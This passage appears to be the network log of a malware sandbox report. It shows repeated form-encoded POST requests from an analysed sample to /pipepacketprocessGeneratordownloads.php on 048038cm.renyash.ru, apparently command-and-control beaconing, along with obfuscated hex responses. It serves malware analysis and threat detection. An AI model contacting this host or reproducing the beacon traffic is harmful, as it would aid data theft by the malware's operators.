                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=9785&min_rtt=1677&rtt_var=7506&sent=684&recv=762&lost=0&retrans=2&sent_bytes=104282&recv_bytes=471582&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 23 53 3c 1d 2a 1d 34 05 28 54 33 2c 07 07 3e 2d 2e 05 29 0e 0d 09 3d 16 20 0c 25 28 3c 59 2b 38 2d 19 25 2f 08 1e 22 2d 38 1f 28 3a 21 46 04 1e 21 5d 37 00 2b 03 28 20 22 0c 3d 12 2c 17 36 09 22 01 26 2a 21 53 26 5e 33 10 35 02 2f 13 33 05 23 53 38 24 25 05 2d 30 25 53 31 2e 2c 5e 0e 12 3a 0e 32 33 22 04 2b 38 29 59 27 30 16 08 27 38 25 11 27 05 33 55 23 01 39 1b 3f 56 28 0a 30 3f 3c 54 2c 2b 06 05 27 39 3c 13 2a 08 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98#S<*4(T3,>-.)= %(<Y+8-%/"-8(:!F!]7+( "=,6"&*!S&^35/3#S8$%-0%S1.,^:23"+8)Y'0'8%'3U#9?V(0?<T,+'9<*!^/,Q4TV0
                                                                        Dec 28, 2024 20:44:08.383023024 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:08.716012001 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:09.243686914 CET967INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:09 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Oy2OyxiiZdqsbIVYfp20Lo2Fy%2FOExv%2BqWWIt6ekwWlOBcc3nk5yYpVsuGkyi4xzoKsDi3fniC0D%2B0Ci1x3zw9RBcEGB4M1phbu2yjY75SrmH9Hk6h1tpybLyZhn7OWuSAEY%2BRFPL"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940b15798f42cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=9375&min_rtt=1677&rtt_var=6831&sent=690&recv=767&lost=0&retrans=2&sent_bytes=105270&recv_bytes=473988&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 23 53 2b 1a 36 13 34 3b 02 55 30 12 3e 59 3e 2d 0b 5d 29 1e 27 45 2b 2b 3f 51 25 38 2b 00 3e 2b 21 19 30 2f 26 57 22 3e 2c 57 3f 00 21 46 04 1e 21 58 21 2d 23 02 2a 20 22 0e 29 02 24 5c 36 20 25 59 24 3a 21 1a 25 3b 38 0b 21 02 02 08 33 02 0d 1b 2d 34 36 14 2d 33 3a 0a 31 04 2c 5e 0e 12 39 50 26 30 13 12 3c 38 25 58 27 1e 30 08 26 05 31 5b 24 05 30 08 21 2b 39 5d 28 09 2b 54 24 01 3f 0e 39 3b 2f 5f 33 39 2f 0e 3d 18 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98#S+64;U0>Y>-])'E++?Q%8+>+!0/&W">,W?!F!X!-#* ")$\6 %Y$:!%;8!3-46-3:1,^9P&0<8%X'0&1[$0!+9](+T$?9;/_39/=!^/,Q4TV0
                                                                        Dec 28, 2024 20:44:09.246526957 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:09.579026937 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:10.114824057 CET972INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:09 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qNkNJLBrv6rNO2g9%2BqkfeU0102cLQ%2FSbU%2B8dARLqgmu2r7mB9ca9FTABpUV92vlWZrHxPUzSR6UGZ3K5WRZuD%2FmMB3NlyGpvkbFjZR8OmQeXgBC6cvt6Ww%2B2uFMA%2FuULAiyLD6yC"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940b1adf6c42cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=10492&min_rtt=1677&rtt_var=9274&sent=696&recv=772&lost=0&retrans=2&sent_bytes=106262&recv_bytes=476394&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 20 0b 28 37 25 01 20 3b 20 57 26 2f 32 14 3e 03 3d 1e 28 30 24 19 2a 16 38 0c 25 2b 3b 01 2b 2b 36 44 30 06 36 1c 22 13 20 56 3c 10 21 46 04 1e 22 00 34 2d 33 00 2a 23 22 0b 29 5a 38 5e 23 33 26 07 24 39 2e 09 27 28 3c 0e 20 3f 3f 1c 25 3c 28 0b 2f 42 32 19 2f 20 29 57 31 04 2c 5e 0e 12 39 1b 25 56 22 00 28 01 3e 02 24 1e 23 50 26 2b 29 5a 24 3b 23 1e 37 06 2e 07 3c 30 3f 54 30 59 24 57 3a 3b 23 1b 30 17 34 1d 3e 32 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98 (7% ; W&/2>=(0$*8%+;++6D06" V<!F"4-3*#")Z8^#3&$9.'(< ??%<(/B2/ )W1,^9%V"(>$#P&+)Z$;#7.<0?T0Y$W:;#04>2!^/,Q4TV0
                                                                        Dec 28, 2024 20:44:10.120981932 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:10.453563929 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:10.990828991 CET979INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:10 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BCNFCrlEGZ7TAVtJW7mR%2BungRIv%2B%2F%2BawX9UJiLllkGd7Fmr7gK90CMdhMAe7BAcxOtOvLJmjI76IfAWjJ19%2FHO3uZyZq4s%2BvVpED6U90441LjDagFeEZvs3JseTn%2Bfk%2B8H85n3gv"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940b205dde42cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=11378&min_rtt=1677&rtt_var=10803&sent=702&recv=777&lost=0&retrans=2&sent_bytes=107259&recv_bytes=478800&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 20 0f 2b 24 35 07 23 2b 2b 0b 26 2c 3a 16 2a 03 3d 1e 28 30 2f 08 29 16 2b 1c 31 3b 30 59 28 3b 3e 09 25 2c 3a 57 21 3d 24 1e 2b 00 21 46 04 1e 22 03 34 3d 3c 5b 3d 30 3e 0c 3d 02 2f 06 23 23 22 01 30 04 3e 0e 26 5e 3c 0e 22 05 20 09 30 02 3b 51 2d 34 2a 17 2f 33 21 10 25 2e 2c 5e 0e 12 39 53 25 30 3d 59 2b 38 36 02 24 56 28 0f 25 2b 31 1f 27 2b 24 0e 34 28 2a 01 28 0e 3c 0a 26 3c 38 54 3a 02 28 07 30 17 2f 0c 2b 32 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98 +$5#++&,:*=(0/)+1;0Y(;>%,:W!=$+!F"4=<[=0>=/##"0>&^<" 0;Q-4*/3!%.,^9S%0=Y+86$V(%+1'+$4(*(<&<8T:(0/+2!^/,Q4TV0
                                                                        Dec 28, 2024 20:44:10.994580984 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2076
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:11.328716040 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:12.314881086 CET975INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:11 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4p%2Btke9lVmjih7YvbNXy1%2BN4H20uk40CS2OqsedU%2B%2BPReDTcE6pu%2BIoTAe42%2BM8d8qC6bMQOq2dHiU%2BQMXanl6iXR41PIophUOuK2aixnCdOFyGiwQAXEvdMQBTP6m0BSK9yTlFN"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940b25cbc142cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=12031&min_rtt=1677&rtt_var=11584&sent=708&recv=782&lost=0&retrans=2&sent_bytes=108263&recv_bytes=481182&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 20 0a 2b 24 08 13 37 15 24 57 27 3f 22 5c 3d 3d 39 1e 3e 1e 0a 18 29 06 37 56 32 38 33 07 3c 2b 29 1c 24 2c 26 1e 36 3d 2f 0d 28 10 21 46 04 1e 21 5a 37 07 20 58 2a 0d 35 55 2a 12 38 14 22 23 3d 5c 24 5c 3d 52 27 28 3f 1f 20 3c 24 0e 33 02 09 50 2c 37 35 03 3a 20 3e 0f 24 2e 2c 5e 0e 12 3a 0e 25 1e 14 05 28 28 21 11 26 23 20 0e 31 15 03 5c 24 3b 2f 55 20 3b 25 15 2b 09 23 57 24 3f 20 54 39 05 28 04 24 2a 28 1d 29 32 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98 +$7$W'?"\==9>)7V283<+)$,&6=/(!F!Z7 X*5U*8"#=\$\=R'(? <$3P,75: >$.,^:%((!&# 1\$;/U ;%+#W$? T9($*()2!^/,Q4TV0
                                                                        Dec 28, 2024 20:44:12.315301895 CET975INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:11 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4p%2Btke9lVmjih7YvbNXy1%2BN4H20uk40CS2OqsedU%2B%2BPReDTcE6pu%2BIoTAe42%2BM8d8qC6bMQOq2dHiU%2BQMXanl6iXR41PIophUOuK2aixnCdOFyGiwQAXEvdMQBTP6m0BSK9yTlFN"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940b25cbc142cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=12031&min_rtt=1677&rtt_var=11584&sent=708&recv=782&lost=0&retrans=2&sent_bytes=108263&recv_bytes=481182&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 20 0a 2b 24 08 13 37 15 24 57 27 3f 22 5c 3d 3d 39 1e 3e 1e 0a 18 29 06 37 56 32 38 33 07 3c 2b 29 1c 24 2c 26 1e 36 3d 2f 0d 28 10 21 46 04 1e 21 5a 37 07 20 58 2a 0d 35 55 2a 12 38 14 22 23 3d 5c 24 5c 3d 52 27 28 3f 1f 20 3c 24 0e 33 02 09 50 2c 37 35 03 3a 20 3e 0f 24 2e 2c 5e 0e 12 3a 0e 25 1e 14 05 28 28 21 11 26 23 20 0e 31 15 03 5c 24 3b 2f 55 20 3b 25 15 2b 09 23 57 24 3f 20 54 39 05 28 04 24 2a 28 1d 29 32 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98 +$7$W'?"\==9>)7V283<+)$,&6=/(!F!Z7 X*5U*8"#=\$\=R'(? <$3P,75: >$.,^:%((!&# 1\$;/U ;%+#W$? T9($*()2!^/,Q4TV0
                                                                        Dec 28, 2024 20:44:12.315669060 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:12.649872065 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:13.183710098 CET972INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:13 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B8ZfXhr1c%2BiL8EtqBGpq7Xudd2tt%2FTMOTusmn9gmcQcdlykMlAtzk7kBGH5AbCJpCOUgqS5BuLzLM%2BbkGXevc%2BlqboKfyWhLAoFJvkya%2Filbgqz4zQwjtt5W0BsYSWFcBC6jePwx"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940b2e0bc642cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=11451&min_rtt=1677&rtt_var=9836&sent=714&recv=787&lost=0&retrans=2&sent_bytes=109263&recv_bytes=483588&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 23 56 3c 24 00 10 23 38 2f 0d 26 2f 31 06 29 04 3a 03 28 23 2f 08 3e 28 19 50 25 28 0e 59 2b 01 29 1c 24 2f 22 55 22 2d 0a 57 3f 00 21 46 04 1e 21 58 23 2e 2c 10 2a 0d 25 1e 2b 3c 2c 5b 22 30 17 14 27 39 26 0f 31 06 27 10 22 2c 27 56 30 3c 02 0e 3b 1a 3e 14 2d 56 39 55 31 2e 2c 5e 0e 12 3a 0a 32 0e 25 5d 28 3b 26 03 33 0e 15 1c 31 5d 21 11 30 02 2f 57 37 5e 21 15 28 1e 15 1d 24 01 20 10 2e 2b 05 5d 27 07 2b 0d 3e 32 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98#V<$#8/&/1):(#/>(P%(Y+)$/"U"-W?!F!X#.,*%+<,["0'9&1'",'V0<;>-V9U1.,^:2%](;&31]!0/W7^!($ .+]'+>2!^/,Q4TV0
                                                                        Dec 28, 2024 20:44:13.184525967 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:13.518547058 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:14.005033970 CET973INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:13 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0R591Tu4whVNy7CDV%2FNb06gE4q%2FIi%2Fi8ccHalga%2BBUV1THDdEw%2B5RupnTTQX7yqxUfZckvWfDj8s%2FruIzLjXSmpMtYttY5t9KPuFCsyjIeFL0BntOPYE2IbUuitqmHSyLY0clwEN"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940b33795442cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=11807&min_rtt=1677&rtt_var=10485&sent=719&recv=792&lost=0&retrans=2&sent_bytes=110260&recv_bytes=485994&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 20 0d 28 1d 32 5e 20 2b 28 55 30 3c 07 07 29 03 3e 01 3d 33 34 19 29 28 20 0f 27 28 02 5b 3c 28 36 41 24 01 3a 57 20 2e 30 1e 3f 3a 21 46 04 1e 21 13 34 2d 34 59 2a 33 21 54 29 02 3c 14 22 0e 21 5d 30 3a 2a 0e 32 28 23 1f 22 2c 28 09 30 2c 24 0a 3b 0a 3d 07 39 30 21 56 32 14 2c 5e 0e 12 3a 0b 25 23 21 5a 28 06 1c 02 27 1e 28 08 32 05 0b 5a 33 3b 2c 0e 37 06 3e 04 2b 09 24 0d 26 3f 2f 0f 2d 28 3b 59 26 3a 28 57 29 08 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98 (2^ +(U0<)>=34)( '([<(6A$:W .0?:!F!4-4Y*3!T)<"!]0:*2(#",(0,$;=90!V2,^:%#!Z('(2Z3;,7>+$&?/-(;Y&:(W)!^/,Q4TV0
                                                                        Dec 28, 2024 20:44:14.011300087 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:14.344264984 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:14.874931097 CET965INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:14 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dsU62266IxOqCGOEURneQWADOOKn7EzgqUu8lIANTs8LM5p3RjgMdiFki3bmZold6iSHzoIQZLcp9khhpIT4iqPlAtY5UfqH0NeEUn3lV95vyT3qDui%2FNEykdlWR%2BqxLkvoME4SN"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940b38aec942cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=12596&min_rtt=1677&rtt_var=11044&sent=724&recv=797&lost=0&retrans=2&sent_bytes=111258&recv_bytes=488400&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 23 1e 2b 37 3a 10 20 2b 37 0e 33 02 21 00 3e 3d 3a 02 28 23 2c 1c 29 5e 37 55 26 01 3c 5e 2b 38 25 1b 33 06 2a 54 22 3e 37 0c 3c 3a 21 46 04 1e 22 02 20 10 24 58 2a 1d 35 56 3e 02 2b 04 35 09 29 15 33 04 00 0b 32 3b 30 0c 36 5a 23 51 27 12 23 50 2c 1a 26 17 2e 33 22 0d 32 3e 2c 5e 0e 12 39 56 26 33 3d 11 3c 38 18 03 26 20 30 08 26 2b 0b 58 30 38 2f 13 21 38 25 5d 2b 23 24 0d 26 2f 3f 0f 2d 38 27 5c 33 00 28 1d 29 32 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98#+7: +73!>=:(#,)^7U&<^+8%3*T">7<:!F" $X*5V>+5)32;06Z#Q'#P,&.3"2>,^9V&3=<8& 0&+X08/!8%]+#$&/?-8'\3()2!^/,Q4TV0
                                                                        Dec 28, 2024 20:44:14.875672102 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:15.208344936 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:15.734544039 CET971INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:15 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9za65NX%2BdmD2Yc1p%2FMIUVIK4ZZAmviGEPR65RuiAwDdWOpkMCvBjkTd01hKGESFYrurSyQJqjpbJ0BlWqDyeTyTAvnrVYfL8jWivR3kXmfdAkI475dKXYRa%2FwO1%2FM6%2BPMd13wq8j"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940b3e0c3a42cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=12397&min_rtt=1677&rtt_var=10537&sent=730&recv=802&lost=0&retrans=2&sent_bytes=112248&recv_bytes=490806&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 23 54 2a 37 2e 13 37 3b 28 1f 30 3c 3e 16 3e 3d 29 5a 28 20 33 07 2a 2b 24 08 31 01 30 5b 2b 38 2e 0a 24 59 25 0e 36 03 02 1e 2b 3a 21 46 04 1e 21 13 37 58 30 58 29 0a 22 0c 29 2f 3c 5a 22 20 13 1a 26 3a 39 1b 26 06 3c 0d 20 3c 27 56 24 3c 2b 52 2c 0a 03 06 2d 30 21 54 24 3e 2c 5e 0e 12 39 15 32 30 3a 00 29 38 17 5d 24 0e 23 1d 27 3b 3e 02 33 2b 01 1c 21 38 39 14 28 30 23 56 30 59 20 53 2d 38 38 04 26 3a 2f 08 29 22 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98#T*7.7;(0<>>=)Z( 3*+$10[+8.$Y%6+:!F!7X0X)")/<Z" &:9&< <'V$<+R,-0!T$>,^920:)8]$#';>3+!89(0#V0Y S-88&:/)"!^/,Q4TV0
                                                                        Dec 28, 2024 20:44:15.735997915 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2088
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:16.068999052 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:16.576328039 CET969INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:16 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4YJH8r2C8Vt8mrAyv8pNmYAl5l5I7aazIxf9DMVmQmwlrRtW2vxbMIY9L2bN%2FfbCGKuLjWYIm66Qni%2BbTnfYWGPPTXSvqfL8%2BhX2kFgMqcd7O7Uh7LT8R11RgLO1l%2Fbgu4z6gbfJ"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940b4369b542cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=12157&min_rtt=1677&rtt_var=10076&sent=735&recv=807&lost=0&retrans=2&sent_bytes=113244&recv_bytes=493200&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 23 55 2b 0a 26 58 21 2b 23 0b 27 12 2e 5d 2a 03 08 02 3d 23 30 1a 3d 5e 3f 55 26 5e 2c 59 3f 2b 36 0a 33 3f 29 09 36 3d 37 0d 3c 00 21 46 04 1e 21 1e 23 58 2f 01 2a 33 36 0e 29 12 33 03 23 23 3d 5c 33 3a 2e 08 27 28 2f 54 36 02 2c 0f 30 02 0d 52 2f 24 22 5b 2f 23 22 0f 25 2e 2c 5e 0e 12 39 51 31 20 2a 03 28 3b 3e 00 24 0e 2b 1f 25 05 3d 5d 33 05 0d 51 34 28 25 5e 2b 1e 3f 56 33 3f 3c 53 2c 3b 3b 58 27 00 2b 09 2b 22 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98#U+&X!+#'.]*=#0=^?U&^,Y?+63?)6=7<!F!#X/*36)3##=\3:.'(/T6,0R/$"[/#"%.,^9Q1 *(;>$+%=]3Q4(%^+?V3?<S,;;X'++"!^/,Q4TV0
                                                                        Dec 28, 2024 20:44:16.577056885 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:16.909311056 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:17.755738020 CET965INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:17 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
